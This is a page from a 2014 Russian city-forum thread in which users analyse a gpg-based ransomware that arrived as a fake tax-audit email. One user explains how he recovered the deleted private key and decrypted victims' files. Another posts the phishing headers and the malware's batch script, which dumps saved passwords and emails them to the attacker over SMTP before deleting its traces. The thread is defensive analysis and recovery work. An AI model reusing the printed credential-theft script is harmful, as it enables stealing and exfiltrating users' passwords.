 |
Ярпортал: форум Ярославля  |
 Совместные покупки Объявления  Поиск  Все вопросы: yaroslavl@bk.ru
|
| Здравствуйте, Гость ( Вход·Регистрация ) | Сделать Yarportal.Ru стартовой страницей |
|
| Страницы: (17) « Первая ... 3 4 [5] 6 7 ... Последняя » ( Перейти к первому непрочитанному сообщению ) |    |
| EWiZaRD |
Дата 2.06.2014 - 13:22
|
|
И у нас сегодня на одном компе появилось. Антивирус (SCEP) пропустил.
Повезло, удалось восстановить содержимое удаленного файла секретных ключей (secring.gpg) с диска. Сейчас сижу, жду, пока скрипт расшифровки отработает. У кого файлы зашифровались, советую выключить комп, чтобы шанс затереть нужные сектора был меньше. Чуть позже напишу, как я искал, может и у вас получится  Это сообщение отредактировал EWiZaRD - 3.06.2014 - 08:29 |
|
 
|
| satanic |
Дата 2.06.2014 - 13:54
|
|||
Не исключаю такой вариант - собственно потому и интересно взглянуть на хедер письма  fawkes999 это скорей "принято считать что лучшие безопасники в Тензоре" (хотя кем принято - тоже вопрос) - но сильно в этом сомневаюсь на практике... моё ИМХО! |
||||
|
|
| satanic |
Дата 2.06.2014 - 14:02
|
|
EWiZaRD неслыханно повезло чо
))) судя по описанию этой дряни - файлы ключей перед удалением несколько раз перезаписываются белибердой... Может ранняя версия криптора попалась? |
|
|
|
| EWiZaRD |
Дата 2.06.2014 - 14:28
|
|
Итак, как развивались события (опуская бесполезные методы и подходы
)Файл в составе вируса, создающий и удаляющий ключи - cde.cmd, из него нам интересно: %SCV%%PRB%--import "%TEMP%\secrypt.cry" %SCV%%PRB%--homedir "%TEMP%" --batch --gen-key genkey.cry %SCV%%PRB%-r StyxKey --yes --trust-model always --no-verbose -q --encrypt-files "%TEMP%\secring.gpg" ... move /y "%TEMP%\secring.gpg.gpg" "%TEMP%\secring.gpg" RENAME "%TEMP%\secring.gpg" KEY.PRIVATE т.е. ключ действительно создается каждый раз (--gen-key) и потом зашифровывается (--encrypt-files) уже безвозвратно. secring.gpg после этого перезаписывается мусором и просто так его не востановить. Файл genkey.cry удалось восстановить из удаленных (R-Studio или аналогичная). Его содержимое: %pubring pubring.gpg %secring secring.gpg Key-Type: RSA Key-Length: 1024 Name-Real: unstyx Name-Comment: unstyx Name-Email: unstyx@mail2tor.com Expire-Date: 0 Passphrase: unstyx Что сделал я: 1.Поставил себе gnupg (лучше бы, наверное, ту же верию 1.4, что и в вирусе, но поставил 2.2). 2.Сгенерил три пары ключей пользуясь genkey.cry как файлом параметров. Файл secring.gpg трижды оказался длиной 739 байт и вначале у каждого была сигнатура 0х95 0x01. Также в файле в открытом виде лежит email (unstyx@mail2tor.com). 3.Скачал disk editor, запустил поиск unstyx@mail2tor.com. Оп-па, второе же вхождение имеет 0x95 0x01 вначале и окружено 0x00. Копируем этот блок в новый файл - 738 байт. Почти-почти, может версия играет роль 2.2 vs 1.4. Кладем файл под именем secring.gpg в каталог GnuPG. gpg2 --list-secret-keys: C:/Users/EWiZaRD/AppData/Roaming/gnupg/secring.gpg ------------------------------------------------------ sec 1024R/6C1328AF 2014-06-02 uid unstyx (unstyx) <unstyx@mail2tor.com> Есть секретный ключ, мы уже рядом gpg2 --output "1.rar" --decrypt "1.rar.unstyx@gmail_com" вводим пароль (unstyx из genkey.cry) и ТА-ДА! 1.rar снова с нами. Далее дело техники. unstyx.cmd: @echo off for %%I in (*.unstyx@gmail_com) do ( gpg2 --output "%%~nI" --decrypt "%%I" del "%%I" ) sweep unstyx и можно открывать шампанское, принесенное благодарным пользователем P.S. добавлением всего двух команд в cde.cmd можно сделать так, чтобы этот и подобные подходы не сработали, но я не такой дурак, чтобы говорить об этом вслух ) Это сообщение отредактировал EWiZaRD - 2.07.2014 - 14:51 |
|
|
|
| medorov |
Дата 2.06.2014 - 14:46
|
|
EWiZaRD
Готовьтесь к заказам satanic Хедеры левые. Подпись в письме тоже. Т.е. по сути воруется адресная книга. Received: from mxfront1m.mail.yandex.net ([127.0.0.1]) by mxfront1m.mail.yandex.net with LMTP id LEOuUOUr for <***>; Fri, 30 May 2014 17:21:14 +0400 Received: from smtp4.000webhost.com (smtp4.000webhost.com [31.170.163.249]) by mxfront1m.mail.yandex.net (nwsmtp/Yandex) with ESMTP id 7WYZoX8g0R-LDHCVpts; Fri, 30 May 2014 17:21:14 +0400 X-Yandex-Front: mxfront1m.mail.yandex.net X-Yandex-TimeMark: 1401456074 X-Yandex-Uniq: ded621b0-3226-478b-af2c-8380f69b3bbb X-Yandex-Spam: 1 Received: by postlady.000webhost.com ([000webhost.com Mail Server], from userid 99) id 451BF60385; Fri, 30 May 2014 09:21:13 -0400 (EDT) X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on postlady.000webhost.com X-Spam-Level: * X-Spam-Status: No, score=1.9 required=7.0 tests=FREEMAIL_FROM,HTML_MESSAGE, HTML_MIME_NO_HTML_TAG,MIME_HTML_ONLY,RP_MATCHES_RCVD,SUBJECT_NEEDS_ENCODING, SUBJ_ILLEGAL_CHARS,TVD_RCVD_SPACE_BRACKET autolearn=disabled version=3.3.2 Received: from srv39.000webhost.com (srv39.000webhost.com [31.170.160.103]) by postlady.000webhost.com ([000webhost.com Mail Server]) with ESMTP id 276F86036C for <***>; Fri, 30 May 2014 09:21:12 -0400 (EDT) Received: by srv39.000webhost.com (Postfix, from userid 3028908) id 2551130E59E; Fri, 30 May 2014 09:21:12 -0400 (EDT) To: *** Subject: Внеплановая проверка налоговой X-PHP-Script: jkashdjas.netai.net/ for 31.170.160.110 From: =?UTF-8?B?0JzQuNGF0LDQuNC7INCh0L7Qu9C10L3QuNC60L7Qsg==?= <***@mail.ru> Subject: Внеплановая проверка налоговой MIME-Version: 1.0; Content-type: multipart/mixed; boundary="--email" Reply-To: ***@mail.ru Message-Id: <20140530132112.2551130E59E@srv39.000webhost.com> Date: Fri, 30 May 2014 09:21:12 -0400 (EDT) Return-Path: a3028908@srv39.000webhost.com X-Yandex-Forward: 75d33895443543bc12333bbfd7330a4b Это собственно второй cmd как раз отвечающий за распространение насколько я понимаю. "cd "%TEMP%" RENAME "%TEMP%\input.cry" "input.exe" RENAME "%TEMP%\javav.cry" "javav.exe" set NP=input set STX=unstyx set ml=maielr@yandex.ru set pwrd=xsenderpwd set DLEE=del %NP%.exe /stext pdw.txt ping 127.0.0.1 -n 1 javav.exe /to %STX%@gmail.com /from %ml% /subject "%COMPUTERNAME%" /port 25 /HOST smtp.yandex.ru /auth 1 /USERID %ml% /PASS "%pwrd%" /files pdw.txt :okay %DLEE%/f /q "%TEMP%\javav.exe" %DLEE%/f /q "%TEMP%\%NP%.exe" %DLEE%/f /q "%TEMP%\%NP%.cfg" %DLEE%/f /q "%TEMP%\pdw.txt" %DLEE%/f /q "%TEMP%\mlai.js" %DLEE%/f /q "%TEMP%\gr.cmd" %DLEE%/f /q %0" |
|
|
|
| s-maxx |
Дата 2.06.2014 - 14:49
|
|
Блеать, такой и по ай-пи может вычислить   |
||
|
|
| medorov |
Дата 2.06.2014 - 14:53
|
|
Мне больше интересно, заяву кто-нибудь из пострадавших оформит в управление или как всегда?:-)
|
|
|
|
| outsayder |
Дата 2.06.2014 - 14:54
|
|
EWiZaRD
 мое уважение ..... правильно, этому сертификаты мелкософта не учат.... Это сообщение отредактировал outsayder - 2.06.2014 - 14:54 |
|
|
|
| satanic |
Дата 2.06.2014 - 14:57
|
|
Плюсуюсь! ))) |
||
|
|
| blessk |
Дата 2.06.2014 - 14:58
|
|
EWiZaRD
круто! |
|
|
|
| shoosha |
Дата 2.06.2014 - 15:01
|
|
6500р попросили
|
|
|
|
| satanic |
Дата 2.06.2014 - 15:09
|
|
Мыло у товарища явно в дипвебе (судя по mail2tor)... для органов та еще задача поймать злодея... |
||
|
|
| Razgilday |
Дата 2.06.2014 - 16:13
|
|
А шифрует что? Почту, либо вообще файлы любые на компе?
|
|
|
|
| ryab_i4 |
Дата 2.06.2014 - 16:17
|
|
*.jpg, *.doc(x), *.xls(x), *.zip, *.rar, *.pdf добавляет расширение например: *.pdf.unstyx@gmail_com Это сообщение отредактировал ryab_i4 - 2.06.2014 - 16:29 |
||
|
|
| ТО)(@ |
Дата 2.06.2014 - 16:19
|
|
офисные крысы!
|
|
|
|
« | Авто-Ярославль | »
Страницы:
(17) « Первая ... 3 4 [5] 6 7 ... Последняя » |
|
[ Время генерации скрипта: 0.0114 ] [ Использовано запросов: 15 ] [ GZIP включён ]
Правила Ярпортала (включая политику обработки персональных данных)
Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.